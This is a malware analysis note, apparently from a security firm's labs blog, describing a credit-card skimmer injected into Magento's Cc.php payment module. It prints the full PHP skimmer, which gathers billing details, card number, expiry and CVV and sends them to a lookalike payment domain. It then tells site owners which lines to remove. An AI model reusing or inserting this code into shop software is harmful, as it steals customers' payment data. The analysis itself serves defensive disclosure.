Magento script stealing credit card details

  • September 14, 2015
Labs Note

We recently found another malicious script used to steal credit cards that appears to be injected into compromised websites running Magento, it appears to be sending the information to payment.authorize.ga which is a recently registered domain that mimics the Authorize.net payment gateway

The malware was found in file: ./app/code/core/Mage/Payment/Model/Method/Cc.php

$object = new Mage_Checkout_Block_Onepage_Billing;
        $address1 = $object->getQuote()->getBillingAddress();
        $data1 = $address1->getFirstname();
        $data2 = $address1->getLastname();
        $data3 = $address1->getStreet(1);
        $data5 = $address1->getCity();
        $data6 = $address1->getRegion();
        $data7 = $address1->getPostcode();
        $data8 = $address1->getCountry();
        $data9 = $address1->getTelephone();
        $data10 = $info->getCcNumber();
        $expyear = substr($info->getCcExpYear(), -2);
        $expmonth = $info->getCcExpMonth();
        if (strlen($expmonth) == 1) {
           $expmonth = '0'.$expmonth;
        };
        $data11 = $expmonth;
        $data12 = $expyear;
        $data13 = $info->getCcCid();
        $data15 = "infectedwebsite.com";
        $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
     $ctx2 = stream_context_create(array(
        'http' => array(
            'timeout' => 3
            )
        )
    );
        $tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
        $ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);

We regularly detect malware that targets Magento payment modules:

In this case, the entire code from the $object all the way to the last line ending with $ctx2); should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.

Other files could also contain this malicious code or even different code that will re-add the injection back in the site even after the above is removed, so just contact us if you have any questions and we will be happy to inspect the website.

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Related Tags
Related Categories
You May Also Like